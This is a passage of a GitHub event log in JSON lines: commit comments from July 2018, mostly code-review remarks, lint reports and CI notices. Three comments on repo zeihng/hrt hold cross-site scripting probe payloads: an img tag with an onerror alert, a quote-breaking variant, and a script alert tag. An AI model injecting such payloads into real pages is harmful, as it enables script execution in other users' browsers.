[num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:48:25Z"}
{"id":"8000427597","type":"CommitCommentEvent","actor":{"login":"jdegoes"},"repo":{"name":"sideeffffect/scalaz-zio"},"payload":{"comment":{"id":29793077,"position":64,"line":908,"path":"core/shared/src/main/scala/scalaz/zio/IO.scala","commit_id":"7ca95d7905fb612c9f0e923bec9537ec82f6b839","created_at":"2018-07-22T15:48:44Z","updated_at":"2018-07-22T15:48:44Z","author_association":"NONE","body":"I'd prefer to call it `parAll` to match with `forkAll`, `raceAll`, etc. If you know this is `sequence`, you'll probably be writing polymorphic code and not calling this concrete method, anyway."}},"created_at":"2018-07-22T15:48:44Z"}
{"id":"8000428615","type":"CommitCommentEvent","actor":{"login":"dexfs"},"repo":{"name":"thiagoericson/docker-compose-python"},"payload":{"comment":{"id":29793079,"position":5,"line":5,"path":"Dockerfile","commit_id":"aac2374f3df09dba6bf781321b9e9fdb70a87001","created_at":"2018-07-22T15:49:28Z","updated_at":"2018-07-22T15:49:28Z","author_association":"NONE","body":"Isso aqui só faz sentido se for usar servidor web. "}},"created_at":"2018-07-22T15:49:28Z"}
{"id":"8000428789","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793080,"position":39,"line":39,"path":"src/lesson4/Task3.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:49:35Z","updated_at":"2018-07-22T15:49:35Z","author_association":"NONE","body":"как-то очень сложно написан алгоритм, можно гораздо проще, подумай"}},"created_at":"2018-07-22T15:49:35Z"}
{"id":"8000429604","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793083,"position":8,"line":8,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:50:09Z","updated_at":"2018-07-22T15:50:09Z","author_association":"NONE","body":"массивы в руби рекомендуют записывать, разделяя элементы пробелом:\r\n```ruby\r\narr = [1, 2, 3] # good\r\n\r\narr = [1,2,3] # bad\r\n```\r\n"}},"created_at":"2018-07-22T15:50:09Z"}
{"id":"8000430454","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793086,"position":34,"line":34,"path":"src/lesson4/Task4.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:50:39Z","updated_at":"2018-07-22T15:50:39Z","author_association":"NONE","body":"можно было просто count += anArray.length"}},"created_at":"2018-07-22T15:50:39Z"}
{"id":"8000430637","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793087,"position":9,"line":9,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:50:45Z","updated_at":"2018-07-22T15:50:45Z","author_association":"NONE","body":"здесь кажется что-то потерялось перед оператором `%` в последней проверке"}},"created_at":"2018-07-22T15:50:45Z"}
{"id":"8000430669","type":"CommitCommentEvent","actor":{"login":"dexfs"},"repo":{"name":"thiagoericson/docker-compose-python"},"payload":{"comment":{"id":29793088,"position":7,"line":7,"path":"Dockerfile","commit_id":"aac2374f3df09dba6bf781321b9e9fdb70a87001","created_at":"2018-07-22T15:50:47Z","updated_at":"2018-07-22T15:50:47Z","author_association":"NONE","body":"Esse fix só faz sentido se vc for usar servidor web "}},"created_at":"2018-07-22T15:50:47Z"}
{"id":"8000430886","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793092,"position":24,"line":24,"path":"src/lesson4/Task4.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:50:56Z","updated_at":"2018-07-22T15:50:56Z","author_association":"NONE","body":"а тут зачем тебе count?"}},"created_at":"2018-07-22T15:50:56Z"}
{"id":"8000431522","type":"CommitCommentEvent","actor":{"login":"bahelit"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29793095,"position":null,"line":null,"path":null,"commit_id":"61adb1139dd59674c3ac9391594493757d4298a4","created_at":"2018-07-22T15:51:13Z","updated_at":"2018-07-22T15:51:13Z","author_association":"OWNER","body":"The content folder and its' contents didn't get added to the repository.\r\n\r\nProbably already know this but will mention it anyways, to do a blind add of all the new files in your working directory to the repository run\r\n`git add -A`"}},"created_at":"2018-07-22T15:51:13Z"}
{"id":"8000431781","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29793097,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T15:51:22Z","updated_at":"2018-07-22T15:51:22Z","author_association":"NONE","body":"![](https://google.com) [GH - first shot2<img src=d onerror=alert(2);>](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T15:51:22Z"}
{"id":"8000431839","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793098,"position":9,"line":9,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:51:24Z","updated_at":"2018-07-22T15:51:24Z","author_association":"NONE","body":"скобки не нужны, т.к. оператор `&&` имеет приоритет выше, чем `||`"}},"created_at":"2018-07-22T15:51:24Z"}
{"id":"8000431961","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793099,"position":15,"line":15,"path":"src/lesson5/Task1.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:51:30Z","updated_at":"2018-07-22T15:51:30Z","author_association":"NONE","body":"нельзя менять параметры функции"}},"created_at":"2018-07-22T15:51:30Z"}
{"id":"8000432076","type":"CommitCommentEvent","actor":{"login":"Roxy-3D"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29793100,"position":null,"line":null,"path":null,"commit_id":"a35abce1acd19da04c160ae5a861dbd086df82fd","created_at":"2018-07-22T15:51:34Z","updated_at":"2018-07-22T15:51:34Z","author_association":"MEMBER","body":"I think the missing )'s are fixed.   There were two of them missing....\n\n\nOn Sun, Jul 22, 2018 at 2:27 AM, Sanitar <notifications@github.com> wrote:\n\n> Roxy, hello.\n> In bedlevel.cpp I accidentally found another missing ')'\n>\n> #ifdef MANUAL_PROBE_START_Z\n>   #if MANUAL_PROBE_HEIGHT > 0\n>     do_blocking_move_to(rx, ry, MANUAL_PROBE_HEIGHT);\n>     do_blocking_move_to_z(MAX(0,MANUAL_PROBE_START_Z));     //look here\n>   #else\n>     do_blocking_move_to(rx, ry, MAX(0,MANUAL_PROBE_START_Z);\n>   #endif\n> #elif MANUAL_PROBE_HEIGHT > 0\n>   const float prev_z = current_position[Z_AXIS];\n>   do_blocking_move_to(rx, ry, MANUAL_PROBE_HEIGHT);\n>   do_blocking_move_to_z(prev_z);\n> #else\n>   do_blocking_move_to_xy(rx, ry);\n> #endif\n>\n> current_position[X_AXIS] = rx;\n> current_position[Y_AXIS] = ry;\n>\n> #if ENABLED(LCD_BED_LEVELING)\n>   lcd_wait_for_move = false;\n> #endif\n>\n> Thanks for your work. Excellent.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarlinFirmware/Marlin/commit/a35abce1acd19da04c160ae5a861dbd086df82fd#commitcomment-29791436>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIA9YlL12qX5IDL5ok75ATvqqMIxMsTIks5uJClggaJpZM4VZ5U6>\n> .\n>\n"}},"created_at":"2018-07-22T15:51:34Z"}
{"id":"8000433102","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793105,"position":12,"line":12,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:52:16Z","updated_at":"2018-07-22T15:52:16Z","author_association":"NONE","body":"здесь и далее:\r\n\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```ruby\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```"}},"created_at":"2018-07-22T15:52:16Z"}
{"id":"8000433776","type":"CommitCommentEvent","actor":{"login":"ludweeg"},"repo":{"name":"ludweeg/blockchain"},"payload":{"comment":{"id":29793110,"position":14,"line":23,"path":"blockchain.cpp","commit_id":"5bc51694a373a5852cf45007dd6bb94d95b5f9f9","created_at":"2018-07-22T15:52:41Z","updated_at":"2018-07-22T15:52:41Z","author_association":"OWNER","body":"Test parameters: \"1\" and \"3\"."}},"created_at":"2018-07-22T15:52:41Z"}
{"id":"8000434128","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793111,"position":16,"line":16,"path":"src/lesson5/Task1.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:52:55Z","updated_at":"2018-07-22T15:52:55Z","author_association":"NONE","body":"зачем идти от начала и до самого конца? достаточно до середины дойти и проверить"}},"created_at":"2018-07-22T15:52:55Z"}
{"id":"8000434539","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29793112,"position":null,"line":null,"path":null,"commit_id":"e2d2505943ff98ffb8a9363793d736cb920f2b7a","created_at":"2018-07-22T15:53:13Z","updated_at":"2018-07-22T15:53:13Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-22T15:53:13Z"}
{"id":"8000434770","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793113,"position":78,"line":78,"path":"src/lesson5/Task2.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:53:21Z","updated_at":"2018-07-22T15:53:21Z","author_association":"NONE","body":"разбивать на функции, сложно написано"}},"created_at":"2018-07-22T15:53:21Z"}
{"id":"8000434862","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29793114,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T15:53:25Z","updated_at":"2018-07-22T15:53:25Z","author_association":"NONE","body":"![](https://google.com) [GH - first shot2'><img src=d onerror=alert(2);>](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T15:53:25Z"}
{"id":"8000434960","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29793115,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-22T15:53:28Z","updated_at":"2018-07-22T15:53:28Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 45](https://teamcity.otenv.com/viewLog.html?buildId=8982978&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-22T15:53:28Z"}
{"id":"8000435031","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793116,"position":12,"line":12,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:53:31Z","updated_at":"2018-07-22T15:53:31Z","author_association":"NONE","body":"это я про `month-1`"}},"created_at":"2018-07-22T15:53:31Z"}
{"id":"8000435254","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793117,"position":12,"line":12,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:53:40Z","updated_at":"2018-07-22T15:53:40Z","author_association":"NONE","body":"блоки, заключенные в фигурные скобки также, как хеши выделяются пробелами в начале и в конце:\r\n```ruby\r\ncollection.each { |element| do_smth(element) } # good\r\n\r\ncollection.each {|element| do_smth(element)} # bad\r\n```\r\n"}},"created_at":"2018-07-22T15:53:40Z"}
{"id":"8000436045","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29793120,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T15:54:12Z","updated_at":"2018-07-22T15:54:12Z","author_association":"NONE","body":"![](https://google.com) [GH - first shot2'><img src=d onerror=alert(2);><script>alert(2);</script>](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T15:54:12Z"}
{"id":"8000437265","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793124,"position":43,"line":43,"path":"src/lesson5/Task2.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:55:04Z","updated_at":"2018-07-22T15:55:04Z","author_association":"NONE","body":"нельзя изменять параметры функции"}},"created_at":"2018-07-22T15:55:04Z"}
{"id":"8000437540","type":"CommitCommentEvent","actor":{"login":"Dev-iL"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29793127,"position":3,"line":1,"path":"uichoose.m","commit_id":"604d841860fb777ca339937e2b6494d36313d52c","created_at":"2018-07-22T15:55:15Z","updated_at":"2018-07-22T15:55:15Z","author_association":"MEMBER","body":"Nope, same path always regardless of files/folders. `path` holds the root of the selection.\r\n\r\n![result](https://user-images.githubusercontent.com/6509619/43047490-907e639e-8de0-11e8-9b00-15dc0c6cd970.png)\r\n\r\n![uiget](https://user-images.githubusercontent.com/6509619/43047497-9f51e5ee-8de0-11e8-8ab7-7c9f60baad29.png)"}},"created_at":"2018-07-22T15:55:15Z"}
{"id":"8000438008","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793128,"position":12,"line":12,"path":"day_index.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:55:35Z","updated_at":"2018-07-22T15:55:35Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти навзвания диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п."}},"created_at":"2018-07-22T15:55:35Z"}
{"id":"8000438135","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793129,"position":37,"line":37,"path":"src/lesson6/Point.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:55:39Z","updated_at":"2018-07-22T15:55:39Z","author_association":"NONE","body":"сразу return"}},"created_at":"2018-07-22T15:55:39Z"}
{"id":"8000439112","type":"CommitCommentEvent","actor":{"login":"sco1"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29793133,"position":3,"line":1,"path":"uichoose.m","commit_id":"604d841860fb777ca339937e2b6494d36313d52c","created_at":"2018-07-22T15:56:17Z","updated_at":"2018-07-22T15:56:17Z","author_association":"MEMBER","body":"Yes, but that's not what I want to output."}},"created_at":"2018-07-22T15:56:17Z"}
{"id":"8000439698","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793135,"position":null,"line":null,"path":null,"commit_id":"7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8","created_at":"2018-07-22T15:56:41Z","updated_at":"2018-07-22T15:56:41Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7fd22b59ed4973f33d0fdf64f3f3576ab879fcb8/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n"}},"created_at":"2018-07-22T15:56:41Z"}
{"id":"8000440431","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793136,"position":19,"line":19,"path":"src/Modul1/hw3array/Task1.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T15:57:10Z","updated_at":"2018-07-22T15:57:10Z","author_association":"NONE","body":"можно Arrays.toString"}},"created_at":"2018-07-22T15:57:10Z"}
{"id":"8000440639","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793137,"position":null,"line":null,"path":null,"commit_id":"1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7","created_at":"2018-07-22T15:57:17Z","updated_at":"2018-07-22T15:57:17Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/1a8ce482c9aa16347c93352a8f5a2af3cc2bb6f7/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n"}},"created_at":"2018-07-22T15:57:17Z"}
{"id":"8000440776","type":"CommitCommentEvent","actor":{"login":"Dev-iL"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29793138,"position":9,"line":38,"path":"uichoose.m","commit_id":"604d841860fb777ca339937e2b6494d36313d52c","created_at":"2018-07-22T15:57:23Z","updated_at":"2018-07-22T15:57:23Z","author_association":"MEMBER","body":"There needs to be another statement that sets `path`, since otherwise it results in the following error when 2 outputs are requested:\r\n\r\n```matlab\r\nOutput argument \"path\" (and maybe others) not assigned during call to \"uiget\".\r\n```"}},"created_at":"2018-07-22T15:57:23Z"}
{"id":"8000441883","type":"CommitCommentEvent","actor":{"login":"Adelalraee"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29793144,"position":null,"line":null,"path":null,"commit_id":"952710d08e817861e515139549a9d840e7afb086","created_at":"2018-07-22T15:58:09Z","updated_at":"2018-07-22T15:58:09Z","author_association":"NONE","body":"ok thank\n\nبتاريخ ٠٣‏/٠٧‏/٢٠١٨ ٤:٥٧ ص، كتب \"Mahamat Nour Ali Mai\" <\nnotifications@github.com>:\n\n> can you try like this way then try to clean or rebuild your code before\n> run.\n>\n> Intent i = new Intent(this, NumberActivity.class);\n> startActivity(i);\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/udacity/ud839_Miwok/commit/952710d08e817861e515139549a9d840e7afb086#commitcomment-29574313>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Afa9ypnWyecD3DPzdU_c3knQ-6F96C0cks5uCs-fgaJpZM4JmWP8>\n> .\n>\n"}},"created_at":"2018-07-22T15:58:09Z"}
{"id":"8000443271","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793146,"position":17,"line":17,"path":"src/Modul1/hw3array/Task3.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T15:59:05Z","updated_at":"2018-07-22T15:59:05Z","author_association":"NONE","body":"i - всегда равно 0, зачем она тебе тогда? В таком случае while лучше было использовать"}},"created_at":"2018-07-22T15:59:05Z"}
{"id":"8000445104","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793153,"position":21,"line":21,"path":"src/Modul1/hw3array/Task3.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:00:17Z","updated_at":"2018-07-22T16:00:17Z","author_association":"NONE","body":"здесь точно не countArray2 вместо countArray?))"}},"created_at":"2018-07-22T16:00:17Z"}
{"id":"8000446288","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793155,"position":18,"line":18,"path":"src/Modul1/hw3array/Task4.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:00:56Z","updated_at":"2018-07-22T16:00:56Z","author_association":"NONE","body":"расчет новой длины массива лучше тоже вынести в отдельную функцию"}},"created_at":"2018-07-22T16:00:56Z"}
{"id":"8000447455","type":"CommitCommentEvent","actor":{"login":"jsumnerPhD"},"repo":{"name":"SALTISES4/dalite-ng"},"payload":{"comment":{"id":29793157,"position":null,"line":null,"path":null,"commit_id":"844e0f0893d0d98048bc9a0c4bf63bbfa6857008","created_at":"2018-07-22T16:01:45Z","updated_at":"2018-07-22T16:01:45Z","author_association":"MEMBER","body":"All tests passing.\r\n"}},"created_at":"2018-07-22T16:01:45Z"}
{"id":"8000447494","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793159,"position":49,"line":49,"path":"src/Modul1/hw4string/Task2.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:01:46Z","updated_at":"2018-07-22T16:01:46Z","author_association":"NONE","body":"default должна присутствовать!"}},"created_at":"2018-07-22T16:01:46Z"}
{"id":"8000448016","type":"CommitCommentEvent","actor":{"login":"sartemw"},"repo":{"name":"sartemw/SpaceAdventureS"},"payload":{"comment":{"id":29793160,"position":null,"line":null,"path":null,"commit_id":"a9547eabd212d186013ab1b3770b80e4cf84d61e","created_at":"2018-07-22T16:02:06Z","updated_at":"2018-07-22T16:02:06Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-22T16:02:06Z"}
{"id":"8000448642","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793164,"position":14,"line":14,"path":"src/Modul1/hw4string/Task2.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:02:27Z","updated_at":"2018-07-22T16:02:27Z","author_association":"NONE","body":"чтобы не портить вид алгоритма, лучше number присвоить 0 и "}},"created_at":"2018-07-22T16:02:27Z"}
{"id":"8000448870","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29793165,"position":null,"line":null,"path":null,"commit_id":"f0da6350b9d83aeb5b8efde1e7a8986dfbe252a9","created_at":"2018-07-22T16:02:36Z","updated_at":"2018-07-22T16:02:36Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-22T16:02:36Z"}
{"id":"8000451539","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793167,"position":32,"line":32,"path":"src/Modul1/hw5object/Point.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:04:27Z","updated_at":"2018-07-22T16:04:27Z","author_association":"NONE","body":"код не отформатирован"}},"created_at":"2018-07-22T16:04:27Z"}
{"id":"8000452069","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793168,"position":6,"line":6,"path":"src/Modul1/hw5object/Task1.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:04:49Z","updated_at":"2018-07-22T16:04:49Z","author_association":"NONE","body":"оступ между классом и методом, а также между методами"}},"created_at":"2018-07-22T16:04:49Z"}
{"id":"8000452164","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29793169,"position":null,"line":null,"path":null,"commit_id":"7f9ff7bbdabfc0d54c298bb67cf7adac936badbe","created_at":"2018-07-22T16:04:53Z","updated_at":"2018-07-22T16:04:53Z","author_association":"COLLABORATOR","body":"That's easier for sure and I'll definitely leave php for you. ;) But I was doing something else yesterday and had some time to spend every few minutes, so I decided to do it once - and found some license term issues along the way. So there was at least a little benefit of it."}},"created_at":"2018-07-22T16:04:53Z"}
{"id":"8000452295","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29793170,"position":7,"line":7,"path":"src/Modul1/hw5object/Task1.java","commit_id":"90dc5285e25bfafd799add09abce4ba14748a09d","created_at":"2018-07-22T16:04:58Z","updated_at":"2018-07-22T16:04:58Z","author_association":"NONE","body":"не надо делать отступ в первой строчке метода"}},"created_at":"2018-07-22T16:04:58Z"}
